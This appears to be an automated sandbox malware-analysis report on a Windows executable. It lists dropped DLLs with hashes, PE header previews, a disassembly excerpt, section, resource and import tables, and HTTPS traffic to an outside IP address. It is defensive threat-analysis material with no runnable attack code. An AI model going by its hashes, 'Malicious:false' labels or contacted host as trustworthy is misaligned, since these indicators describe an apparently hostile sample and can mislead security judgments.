                                                                                                    SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):257872
                                                                                                    Entropy (8bit):6.727482641240852
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                    MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                    SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                    SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                    SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):80880
                                                                                                    Entropy (8bit):6.920480786566406
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                    MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                    SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                    SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                    SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):685392
                                                                                                    Entropy (8bit):6.872871740790978
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                    MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                    SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                    SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                    SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):608080
                                                                                                    Entropy (8bit):6.833616094889818
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                    MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                    SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                    SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                    SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):450024
                                                                                                    Entropy (8bit):6.673992339875127
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                    MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                    SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                    SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                    SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2046288
                                                                                                    Entropy (8bit):6.787733948558952
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                    MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                    SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                    SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                    SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32768
                                                                                                    Entropy (8bit):0.017262956703125623
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                    Malicious:false
                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Entropy (8bit):6.3809715852323245
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                    File name:pYJeC4VJbw.exe
                                                                                                    File size:358'400 bytes
                                                                                                    MD5:14c3db1bdba407c23f0e80bbfdd6db0f
                                                                                                    SHA1:304c2d438d926f73f58f1ee9635b449b585dddce
                                                                                                    SHA256:596a9e9ed53dbeb50b69a93bfeef67855baf488f3638695b5485fd1c9633fad7
                                                                                                    SHA512:fb5588c6512f7fa4c9706d9f2990259a102a3acb80d0b65c89eec928626ec66d62eebf59a53979a260bdcf69c2c1fdbd7136327560bc0f526bb324ea4d1c5673
                                                                                                    SSDEEP:6144:tF8Izt905uwndEyT28p3W04Wkp58Kofd:H9zb05F9t3Kkf
                                                                                                    TLSH:B774BE41E1B0D822EF1A073D4926C6E4662EBC61AF77D24E725E765F1AF36E08523F01
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..\...\...\....B..]...B_..M...B_..;...B_..v...{...Y...\...,...B_..]...B_..]...B_..]...Rich\...........PE..L...s8lc...........
                                                                                                    Icon Hash:1321352d29170f17
                                                                                                    Entrypoint:0x401604
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x636C3873 [Wed Nov 9 23:32:03 2022 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:5
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:5
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:5
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:20a6a1c56501f5fd78f9b0e0618fa18b
                                                                                                    Instruction
                                                                                                    call 00007F3971268178h
                                                                                                    jmp 00007F39712646DDh
                                                                                                    int3
                                                                                                    int3
                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                    test ecx, 00000003h
                                                                                                    je 00007F3971264886h
                                                                                                    mov al, byte ptr [ecx]
                                                                                                    add ecx, 01h
                                                                                                    test al, al
                                                                                                    je 00007F39712648B0h
                                                                                                    test ecx, 00000003h
                                                                                                    jne 00007F3971264851h
                                                                                                    add eax, 00000000h
                                                                                                    lea esp, dword ptr [esp+00000000h]
                                                                                                    lea esp, dword ptr [esp+00000000h]
                                                                                                    mov eax, dword ptr [ecx]
                                                                                                    mov edx, 7EFEFEFFh
                                                                                                    add edx, eax
                                                                                                    xor eax, FFFFFFFFh
                                                                                                    xor eax, edx
                                                                                                    add ecx, 04h
                                                                                                    test eax, 81010100h
                                                                                                    je 00007F397126484Ah
                                                                                                    mov eax, dword ptr [ecx-04h]
                                                                                                    test al, al
                                                                                                    je 00007F3971264894h
                                                                                                    test ah, ah
                                                                                                    je 00007F3971264886h
                                                                                                    test eax, 00FF0000h
                                                                                                    je 00007F3971264875h
                                                                                                    test eax, FF000000h
                                                                                                    je 00007F3971264864h
                                                                                                    jmp 00007F397126482Fh
                                                                                                    lea eax, dword ptr [ecx-01h]
                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                    sub eax, ecx
                                                                                                    ret
                                                                                                    lea eax, dword ptr [ecx-02h]
                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                    sub eax, ecx
                                                                                                    ret
                                                                                                    lea eax, dword ptr [ecx-03h]
                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                    sub eax, ecx
                                                                                                    ret
                                                                                                    lea eax, dword ptr [ecx-04h]
                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                    sub eax, ecx
                                                                                                    ret
                                                                                                    mov edi, edi
                                                                                                    push ebp
                                                                                                    mov ebp, esp
                                                                                                    sub esp, 20h
                                                                                                    mov eax, dword ptr [ebp+08h]
                                                                                                    push esi
                                                                                                    push edi
                                                                                                    push 00000008h
                                                                                                    pop ecx
                                                                                                    mov esi, 0040C1FCh
                                                                                                    lea edi, dword ptr [ebp-20h]
                                                                                                    rep movsd
                                                                                                    mov dword ptr [ebp-08h], eax
                                                                                                    mov eax, dword ptr [ebp+0Ch]
                                                                                                    pop edi
                                                                                                    mov dword ptr [ebp-04h], eax
                                                                                                    pop esi
                                                                                                    test eax, eax
                                                                                                    je 00007F397126486Eh
                                                                                                    test byte ptr [eax], 00000008h
                                                                                                    je 00007F3971264869h
                                                                                                    mov dword ptr [ebp-0Ch], 00000000h
                                                                                                    Programming Language:
                                                                                                    • [ASM] VS2008 build 21022
                                                                                                    • [ C ] VS2008 build 21022
                                                                                                    • [C++] VS2008 build 21022
                                                                                                    • [IMP] VS2005 build 50727
                                                                                                    • [RES] VS2008 build 21022
                                                                                                    • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d3cc | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x26fc000 | 0x182f8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xc000 | 0x184 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xa8b3 | 0xaa00 | 1b0d94b73a531375c17c0d550876a936 | False | 0.6130744485294117 | data | 6.568276166644049 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xc000 | 0x31ca6 | 0x31e00 | b8b5ef8b47245d569657856709043747 | False | 0.7188625861528822 | data | 6.6625524725723 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x26bd33c | 0x2800 | 78ad3010e5ea8ba2068494691f2f08b6 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x26fc000 | 0x182f8 | 0x18400 | 9453d1d52925a8d5a542d9a50330b1d8 | False | 0.4410740173969072 | data | 5.058743856290898 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
DOWOKEYOT | 0x270f030 | 0xbf7 | ASCII text, with very long lines (3063), with no line terminators | Turkish | Turkey | 0.6026771139405811
RT_CURSOR | 0x270fc48 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.31023454157782515
RT_CURSOR | 0x2710b08 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.7368421052631579
RT_CURSOR | 0x2710c38 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.06130705394190871
RT_ICON | 0x26fc840 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Turkish | Turkey | 0.4144456289978678
RT_ICON | 0x26fd6e8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Turkish | Turkey | 0.5370036101083032
RT_ICON | 0x26fdf90 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Turkish | Turkey | 0.5910138248847926
RT_ICON | 0x26fe658 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Turkish | Turkey | 0.6611271676300579
RT_ICON | 0x26febc0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Turkish | Turkey | 0.4900414937759336
RT_ICON | 0x2701168 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Turkish | Turkey | 0.5098499061913696
RT_ICON | 0x2702210 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Turkish | Turkey | 0.5733606557377049
RT_ICON | 0x2702b98 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Turkish | Turkey | 0.598404255319149
RT_ICON | 0x2703078 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Turkish | Turkey | 0.39285714285714285
RT_ICON | 0x2703f20 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Turkish | Turkey | 0.5180505415162455
RT_ICON | 0x27047c8 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Turkish | Turkey | 0.5766129032258065
RT_ICON | 0x2704e90 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Turkish | Turkey | 0.6264450867052023
RT_ICON | 0x27053f8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Turkish | Turkey | 0.4658713692946058
RT_ICON | 0x27079a0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Turkish | Turkey | 0.521311475409836
RT_ICON | 0x2708328 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Turkish | Turkey | 0.5452127659574468
RT_ICON | 0x27087f8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkish | Turkey | 0.43336886993603413
RT_ICON | 0x27096a0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkish | Turkey | 0.5636281588447654
RT_ICON | 0x2709f48 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkish | Turkey | 0.5967741935483871
RT_ICON | 0x270a610 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkish | Turkey | 0.6589595375722543
RT_ICON | 0x270ab78 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Turkish | Turkey | 0.3755186721991701
RT_ICON | 0x270d120 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Turkish | Turkey | 0.399859287054409
RT_ICON | 0x270e1c8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Turkish | Turkey | 0.42008196721311475
RT_ICON | 0x270eb50 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Turkish | Turkey | 0.424645390070922
RT_STRING | 0x27133e8 | 0x59c | data | | | 0.4415041782729805
RT_STRING | 0x2713988 | 0xa0 | data | | | 0.5875
RT_STRING | 0x2713a28 | 0x5c0 | data | | | 0.4375
RT_STRING | 0x2713fe8 | 0x1ce | data | | | 0.5021645021645021
RT_STRING | 0x27141b8 | 0x13a | data | | | 0.5031847133757962
RT_ACCELERATOR | 0x270fc28 | 0x20 | data | | | 1.09375
RT_GROUP_CURSOR | 0x2710af0 | 0x14 | data | | | 1.25
RT_GROUP_CURSOR | 0x27131e0 | 0x22 | data | | | 1.088235294117647
RT_GROUP_ICON | 0x2703000 | 0x76 | data | Turkish | Turkey | 0.6610169491525424
RT_GROUP_ICON | 0x2708790 | 0x68 | data | Turkish | Turkey | 0.7019230769230769
RT_GROUP_ICON | 0x270efb8 | 0x76 | data | Turkish | Turkey | 0.6694915254237288
RT_VERSION | 0x2713208 | 0x1e0 | data | | | 0.5708333333333333
DLL | Import
KERNEL32.dll | GetCommState, SetDefaultCommConfigW, SetConsoleScreenBufferSize, FreeEnvironmentStringsA, GetModuleHandleW, GetProcessHeap, GetConsoleAliasesLengthA, GetSystemTimes, GetVolumeInformationA, LoadLibraryW, IsBadCodePtr, GetConsoleAliasExesLengthW, lstrcpynW, WriteConsoleW, SetConsoleTitleA, GetLocaleInfoA, FindFirstFileExA, SetLastError, GetProcAddress, GetLongPathNameA, GetConsoleDisplayMode, SetFileAttributesA, BuildCommDCBW, SetFileApisToOEM, LoadLibraryA, LocalAlloc, FindAtomA, WaitForMultipleObjects, GetCurrentDirectoryA, EnumDateFormatsW, GetSystemTime, SetCurrentDirectoryA, EnumCalendarInfoA, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, GetLastError, HeapFree, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, DeleteCriticalSection, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, GetConsoleCP, GetConsoleMode, EnterCriticalSection, LeaveCriticalSection, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, VirtualAlloc, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, CreateFileA, CloseHandle, FlushFileBuffers
ADVAPI32.dll | ReadEventLogA
Language of compilation system | Country where language is spoken | Map
Turkish | Turkey |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                    May 3, 2024 11:21:26.661422014 CEST49740443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:26.661436081 CEST44349740168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:27.019382000 CEST44349740168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:27.022484064 CEST49740443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:27.022995949 CEST49740443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:27.023006916 CEST44349740168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:27.023216963 CEST49740443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:27.023221970 CEST44349740168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:27.023262024 CEST49740443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:27.023271084 CEST44349740168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:27.498955965 CEST44349740168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:27.499020100 CEST44349740168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:27.499177933 CEST49740443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:27.499294043 CEST49740443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:27.499315977 CEST44349740168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:27.499327898 CEST49740443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:27.499366999 CEST49740443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:27.762490988 CEST49741443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:27.762536049 CEST44349741168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:27.762602091 CEST49741443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:27.762948990 CEST49741443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:27.762964010 CEST44349741168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:28.118273020 CEST44349741168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:28.118347883 CEST49741443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:28.119927883 CEST49741443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:28.119946957 CEST44349741168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:28.120126963 CEST49741443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:28.120131969 CEST44349741168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:28.767002106 CEST44349741168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:28.767033100 CEST44349741168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:28.767047882 CEST44349741168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:28.767091990 CEST49741443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:28.767124891 CEST49741443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:28.767136097 CEST44349741168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:28.767183065 CEST49741443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:28.767478943 CEST44349741168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:28.767498016 CEST44349741168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:28.767549992 CEST49741443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:28.767555952 CEST44349741168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:28.767611980 CEST49741443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:28.942979097 CEST44349741168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:28.943011999 CEST44349741168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:28.943067074 CEST49741443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:28.943088055 CEST44349741168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:28.943119049 CEST49741443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:28.943130016 CEST49741443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:28.944164038 CEST44349741168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:28.944181919 CEST44349741168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:28.944226980 CEST49741443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:28.944236994 CEST44349741168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:28.944257975 CEST49741443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:28.944283009 CEST49741443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:28.944869041 CEST44349741168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:28.944885015 CEST44349741168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:28.944931030 CEST49741443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:28.944937944 CEST44349741168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:28.945014954 CEST49741443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:29.117548943 CEST44349741168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:29.117575884 CEST44349741168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:29.117667913 CEST49741443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:29.117691040 CEST44349741168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:29.117732048 CEST49741443192.168.2.4168.119.248.46
